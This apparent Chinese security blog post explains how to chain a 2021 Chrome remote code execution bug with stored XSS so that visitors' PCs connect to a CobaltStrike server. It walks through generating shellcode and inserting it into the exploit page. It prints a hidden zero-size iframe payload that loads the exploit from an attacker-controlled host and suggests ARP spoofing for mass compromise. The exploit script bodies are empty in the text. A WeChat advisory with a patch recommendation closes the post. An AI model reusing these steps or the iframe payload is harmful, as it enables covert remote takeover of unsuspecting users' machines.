XSS + Chrome Rce = 上线到CobaltStrike

前言

最近 Google Chrome 浏览器被爆出存在远程代码执行漏洞（CNVD-2021-27989），攻击者只需要构造一个恶意的 html 页面诱导用户点击访问，就能实现对浏览器的远程代码执行攻击。但是攻击者单独利用该漏洞无法实现沙盒（SandBox）逃逸。沙盒是 Google Chrome 浏览器的安全边界，防止恶意攻击代码破坏用户系统或者浏览器其他页面。Google Chrome 浏览器默认开启沙盒保护模式。

漏洞影响范围：Google Chrome < = 89.0.4389.114。

点击链接打开记事本

该 Poc 来自于网络：

<script>

手动打开 Chrome 的时候关闭沙箱然后打开 poc.html 即可弹出记事本：

chrome.exe -no-sandbox

点击链接上线到 CobaltStrike

首先通过 CobaltStrike 开启一个监听器，我这边选择的是 http：

之后生成一个 C 的 shellcode（x64）：

之后把生成的 Poc 中的 shellcode，\ 替换为 ,0  ：

替换前：

替换后：

之后把 shellcode 替换到第七行里：

<script>

随后保存为 exp.html ，让目标打开：

这个时候目标成功上线到 CobaltStrike：

XSS+Chrome Rce = 上线到CobaltStrike

    假设有一个网站存在存储XSS漏洞，可以插入这段 Payload 并加载一个远程 html 页面，若目标机器关闭了沙盒并且使用的是 Chrome 浏览器，就可导致访问此页面的人上线到 CobaltStrike。

    同时，在内网场景也可使用ARP来进行大规模PC权限的获取。

    具体使用到的标签是：

<iframe src="http://192.168.84.248/exp.html" width="0" height="0">

我把宽度和高度都设置为 0 ，这样目标就无法看到 exp.html 页面了！

演示代码：

其中 http://192.168.84.248/exp.html 是攻击者构造好的恶意页面，当我们访问到了被插入 XSS Payload 的页面，就会自动加载 exp.html 成功上线到 CobaltStrike：

思路大家可自由延伸。

Windows版微信加载JS运行Shellcode

通过微信点击URL链接，过程中会调用微信内置浏览器(chrome内核，并开启了--no-sandbox参数)。针对chrome漏洞利用的js代码成功执行后，shellcode将启动远控进程，最终获取该PC当前用户权限。

Chrome安全问题可能导致Windows版微信任意代码执行漏洞

组件: Windows版微信

漏洞类型: 远程代码执行

影响: PC接管

简述: 攻击者可以通过微信发送一个特制的web链接，用户一旦点击链接，Windows版微信便会加载执行攻击者构造恶意代码，最终使攻击者控制用户PC。

 Tencnet:Windows版微信: 小于等于3.2.1.141版本修复建议

通用修补建议

目前微信已经修复漏洞并发布了更新版本，建议用户立即将Windows版微信更新到3.2.1.141``以上的最新版本。

InBug-实验室

官网：https://www.inbug.org/

InScan内网扫描器：https://github.com/inbug-team/InScan